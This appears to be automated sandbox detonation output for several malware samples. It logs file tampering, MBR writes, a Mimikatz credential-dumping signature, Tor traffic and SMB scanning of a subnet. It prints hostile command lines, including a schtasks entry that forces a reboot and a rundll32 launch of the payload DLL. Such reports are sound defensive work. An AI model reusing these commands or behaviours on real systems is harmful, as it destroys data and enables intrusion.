| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\EXITEM.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\REPORT.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\TASKREQ.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\XmlFile.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\SplashScreen.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SCHDRESN.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SHARING.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\REC.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SMIMES.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\firefox.cfg | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\GRPHFLT\CGMIMP32.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\CNFRES.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\RESEND.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\SAMPLES\SOLVSAMP.XLS | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Resource.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\MDIParent.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgePackages.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\AccessWeb\SERVWRAP.ASP | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\DISTLIST.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgeCalls.c | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\EmptyDatabase.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Text.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Internet Explorer\en-US\eula.rtf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Visualizer.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\SettingsInternal.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\ACTIVITY.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AppConfigInternal.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\MDIParent.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Form.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgeCalls.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SECREC.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\TASKDEC.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\EmptyDatabase.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Explorer.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\chrome.7z | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgeCallbacks.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Interface.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SCHDREST.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\AssemblyInfoInternal.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\include\jvmticmlr.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.PPT | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\APPT.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\DOC.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\REPLTMPL.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\RSSITEM.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Dataset.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Internet Explorer\en-US\eula.rtf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\RCLRPT.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\UserControl.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\027cc450ef5f8c5f653329641ec1fed9 | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File created | C:\Windows\dllhost.dat | C:\Windows\SysWOW64\rundll32.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\5B4A.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\5B4A.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\5B4A.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\5B4A.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\5B4A.tmp | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\5B4A.tmp | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\027cc450ef5f8c5f653329641ec1fed9.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\027cc450ef5f8c5f653329641ec1fed9.dll,#1
C:\Windows\SysWOW64\cmd.exe
/c schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 23:35
C:\Users\Admin\AppData\Local\Temp\5B4A.tmp
"C:\Users\Admin\AppData\Local\Temp\5B4A.tmp" \\.\pipe\{CF38BF34-BED4-4563-88D5-7D0D4F83C435}
C:\Windows\SysWOW64\schtasks.exe
schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 23:35
Network
| Country | Destination | Domain | Proto |
| N/A | 10.127.0.0:445 | tcp | |
| N/A | 10.127.0.0:139 | tcp | |
| N/A | 10.127.0.1:445 | tcp | |
| N/A | 10.127.0.1:139 | tcp | |
| N/A | 10.127.0.2:445 | tcp | |
| N/A | 10.127.0.2:139 | tcp | |
| N/A | 10.127.0.3:445 | tcp | |
| N/A | 10.127.0.3:139 | tcp | |
| N/A | 10.127.0.4:445 | tcp | |
| N/A | 10.127.0.4:139 | tcp | |
| N/A | 10.127.0.5:445 | tcp | |
| N/A | 10.127.0.5:139 | tcp | |
| N/A | 10.127.0.6:445 | tcp | |
| N/A | 10.127.0.6:139 | tcp | |
| N/A | 10.127.0.7:445 | tcp | |
| N/A | 10.127.0.7:139 | tcp | |
| N/A | 10.127.0.8:445 | tcp | |
| N/A | 10.127.0.8:139 | tcp | |
| N/A | 10.127.0.9:445 | tcp | |
| N/A | 10.127.0.9:139 | tcp | |
| N/A | 10.127.0.10:445 | tcp | |
| N/A | 10.127.0.10:139 | tcp | |
| N/A | 10.127.0.11:445 | tcp | |
| N/A | 10.127.0.11:139 | tcp | |
| N/A | 10.127.0.12:445 | tcp | |
| N/A | 10.127.0.12:139 | tcp | |
| N/A | 10.127.0.13:445 | tcp | |
| N/A | 10.127.0.13:139 | tcp | |
| N/A | 10.127.0.14:445 | tcp | |
| N/A | 10.127.0.14:139 | tcp | |
| N/A | 10.127.0.15:445 | tcp | |
| N/A | 10.127.0.15:139 | tcp | |
| N/A | 10.127.0.16:445 | tcp | |
| N/A | 10.127.0.16:139 | tcp | |
| N/A | 10.127.0.17:445 | tcp | |
| N/A | 10.127.0.17:139 | tcp | |
| N/A | 10.127.0.18:445 | tcp | |
| N/A | 10.127.0.18:139 | tcp | |
| N/A | 10.127.0.19:445 | tcp | |
| N/A | 10.127.0.19:139 | tcp | |
| N/A | 10.127.0.20:445 | tcp | |
| N/A | 10.127.0.20:139 | tcp | |
| N/A | 10.127.0.21:445 | tcp | |
| N/A | 10.127.0.21:139 | tcp | |
| N/A | 10.127.0.22:445 | tcp | |
| N/A | 10.127.0.22:139 | tcp | |
| N/A | 10.127.0.23:445 | tcp | |
| N/A | 10.127.0.23:139 | tcp | |
| N/A | 10.127.0.24:445 | tcp | |
| N/A | 10.127.0.24:139 | tcp | |
| N/A | 10.127.0.25:445 | tcp | |
| N/A | 10.127.0.25:139 | tcp | |
| N/A | 10.127.0.26:445 | tcp | |
| N/A | 10.127.0.26:139 | tcp | |
| N/A | 10.127.0.27:445 | tcp | |
| N/A | 10.127.0.27:139 | tcp | |
| N/A | 10.127.0.28:445 | tcp | |
| N/A | 10.127.0.28:139 | tcp | |
| N/A | 10.127.0.29:445 | tcp | |
| N/A | 10.127.0.29:139 | tcp | |
| N/A | 10.127.0.30:445 | tcp | |
| N/A | 10.127.0.30:139 | tcp | |
| N/A | 10.127.0.31:445 | tcp | |
| N/A | 10.127.0.31:139 | tcp | |
| N/A | 10.127.0.32:445 | tcp | |
| N/A | 10.127.0.32:139 | tcp | |
| N/A | 10.127.0.33:445 | tcp | |
| N/A | 10.127.0.33:139 | tcp | |
| N/A | 10.127.0.34:445 | tcp | |
| N/A | 10.127.0.34:139 | tcp | |
| N/A | 10.127.0.35:445 | tcp | |
| N/A | 10.127.0.35:139 | tcp | |
| N/A | 10.127.0.36:445 | tcp | |
| N/A | 10.127.0.36:139 | tcp | |
| N/A | 10.127.0.37:445 | tcp |
Files
memory/2608-0-0x0000000000290000-0x00000000002EE000-memory.dmp
memory/2608-8-0x0000000000290000-0x00000000002EE000-memory.dmp
memory/2608-9-0x0000000000290000-0x00000000002EE000-memory.dmp
memory/2608-11-0x0000000000290000-0x00000000002EE000-memory.dmp
\Users\Admin\AppData\Local\Temp\5B4A.tmp
| MD5 | 7e37ab34ecdcc3e77e24522ddfd4852d |
| SHA1 | 38e2855e11e353cedf9a8a4f2f2747f1c5c07fcf |
| SHA256 | 02ef73bd2458627ed7b397ec26ee2de2e92c71a0e7588f78734761d8edbdcd9f |
| SHA512 | 1b037a2aa8bf951d2ffe2f724aa0b2fbb39c2173215806ba0327bda7b096301d887f9bb7db46f9e04584b16aa6b1aaeaf67f0ecf5f20eb02ceac27c8753ca587 |
memory/2608-26-0x0000000000290000-0x00000000002EE000-memory.dmp
Analysis: behavioral20
Detonation Overview
Submitted
2024-11-28 22:32
Reported
2024-11-28 22:35
Platform
win10v2004-20241007-en
Max time kernel
150s
Max time network
151s
Command Line
Signatures
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Notepad.lnk | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File created | C:\Windows\assembly\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
| File opened for modification | C:\Windows\assembly\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\assembly | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
| File created | C:\Windows\assembly\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
| File opened for modification | C:\Windows\assembly\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
| Token: 33 | N/A | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\svchost.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| US | 8.8.8.8:53 | 165.120.202.116.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| US | 8.8.8.8:53 | 71.209.201.84.in-addr.arpa | udp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| US | 8.8.8.8:53 | 106.209.201.84.in-addr.arpa | udp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| US | 8.8.8.8:53 | 69.208.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
Files
memory/4016-0-0x00007FFC7EF05000-0x00007FFC7EF06000-memory.dmp
memory/4016-1-0x00007FFC7EC50000-0x00007FFC7F5F1000-memory.dmp
memory/4016-2-0x000000001D5D0000-0x000000001DA9E000-memory.dmp
memory/4016-3-0x000000001DB40000-0x000000001DBDC000-memory.dmp
memory/4016-4-0x000000001DC50000-0x000000001DCB2000-memory.dmp
memory/4016-5-0x000000001BF70000-0x000000001BF78000-memory.dmp
memory/4016-6-0x000000001E2F0000-0x000000001E342000-memory.dmp
memory/4016-14-0x00007FFC7EC50000-0x00007FFC7F5F1000-memory.dmp
memory/4016-15-0x00007FFC7EF05000-0x00007FFC7EF06000-memory.dmp
memory/4016-16-0x00007FFC7EC50000-0x00007FFC7F5F1000-memory.dmp
memory/4016-17-0x00007FFC7EC50000-0x00007FFC7F5F1000-memory.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2024-11-28 22:32
Reported
2024-11-28 22:35
Platform
win10v2004-20241007-en
Max time kernel
92s
Max time network
149s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe
"C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2588 -ip 2588
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2588 -s 368
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.12.20.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
Files
Analysis: behavioral15
Detonation Overview
Submitted
2024-11-28 22:32
Reported
2024-11-28 22:35
Platform
win7-20240903-en
Max time kernel
149s
Max time network
148s
Command Line
Signatures
Mimikatz
Mimikatz family
mimikatz is an open source tool to dump credentials on Windows
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\E4F2.tmp | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | N/A | N/A |
Reads user/profile data of web browsers
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Windows\SysWOW64\rundll32.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\OOFTMPL.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\RESEND.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SCHDRESP.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Settings.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\UserControl.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgeCalls.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\Web Server Extensions\14\BIN\1033\FPEXT.MSG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.PPT | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\POSTIT.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SCHDREQ.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\SettingsInternal.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\LoginForm.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgeCalls.c | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\amd64\jvm.cfg | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\deploy\ffjcext.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\REMOTE.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SECURE.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Documentation\1033\License Agreements\SynchronizationEula.rtf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\IPM.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\AppConfigurationInternal.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861261279.profile.gz | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Form.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\MDIParent.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\OMSMMS.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Internet Explorer\en-US\eula.rtf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\ffjcext.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SCHDCNCL.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\SplashScreen.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgeCallbacks.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLV.XLS | C:\Windows\SysWOW64\rundll32.exe | N/A |
